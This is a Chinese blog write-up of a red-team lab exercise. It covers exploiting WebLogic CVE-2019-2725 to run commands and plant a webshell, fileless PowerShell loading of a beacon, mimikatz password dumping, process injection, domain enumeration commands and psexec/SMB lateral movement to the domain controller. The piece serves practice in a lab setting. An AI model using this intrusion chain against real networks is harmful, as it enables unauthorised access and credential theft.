紅隊靶機實戰(2)

nice_0e3發表於2020-06-06

0x00 前言

[手動滑稽][手動滑稽] 一天一靶機 生活充實而有趣,打算這幾天把紅日的幾個靶機都給擼個遍。打起來還挺有意思。

0x01 環境搭建

至於網路卡配置的話,可以直接看官方的講解怎麼去配,打靶機前要需要啟動web服務,來到server 08 機器 也就是web的機器裡面,進入目錄

C:\Oracle\Middleware\user_projects\domains\base_domain

裡面看到startWebLogic.bat指令碼雙擊點開執行啟動weblogic服務

啟動後就可以開始下一步的滲透工作了,這裡來啟動時候要使用管理員的身份來啟動,否則啟動不了。

0x02 靶機滲透

192.168.111.0這個網路卡是外網的,就直接對他進行掃描

nmap -Pn -sS -A 192.168.111.80

發現了7001埠開放,banner資訊顯示是weblogic的服務,weblogic在歷史是爆出幾個命令執行漏洞的,先來嘗試一下存不存在命令執行漏洞,直接上weblogic scan來掃描

python3 WeblogicScan.py 192.168.111.80 7001

發現存在CVE-2019-2725,CVE-2017-3506

上github隨便找了個CVE-2019-272的exp 來使用

python3 weblogic-2019-2725.py 10.3.6 http://192.168.111.80:7001/ whoami

命令執行成功,使用命令上傳webshell

python3 weblogic-2019-2725.py 10.3.6 http://192.168.111.80:7001/

這個exp裡面自帶了一些webshell

這裡能執行命令成功 那麼為了方便就直接使用pwoershell遠端載入,無檔案落地

成功上線,這裡360居然不攔截,可能是因為斷網的原因,那麼下一步就可以直接來到內網環節了

0x02 內網滲透

先來做波資訊收集,這裡已經顯示了是個管理員的許可權,先來查詢一下域使用者

shell "net user /domain"

發現拒絕訪問了 ,可能是因為許可權是本地的管理員,而並不是域的管理員,這裡顯示拒絕訪問證明沒有許可權,但是確實是在域環境裡面

使用mimikztz抓取密碼,然後進行重新的登入,發現還是一樣的不行,域管理員無法查詢到任何資訊,既然不行的話就使用其他使用者,檢視程式的時候發現了有程式是以mssql的域使用者進行登入的,對該程式進行程式注入

shell "net user /domain"

發現用這個使用者有許可權去查詢,這點讓我非常匪夷所思,那麼就用這個賬號進行查詢

net user /domain

net group /domain

net group "Domain Admins " /domain

net group "Domain Controllers" /domain


net time /domain

ping 10.10.10.10

域控機器ip為 10.10.10.10

使用arp進行內網探測看看內網的機器

發現有3臺機器

剛剛探測發現445埠都是開著的,直接用psexec smb之間的方式,來連線域控

這裡能成功上線 再來抓取一下密碼,然後再把pc拿下來

成功拿下

3臺主機

0x03 結尾

這裡因為也沒看其他的能不能出網就使用了smb的直連過去,smb直連在內網滲透當中,是比較隱蔽的,也能很有效的去穿透防火牆,但是唯一的缺點就是如果父管道的機器掉了,其他的smb直連過去的機器也就掉了

相關文章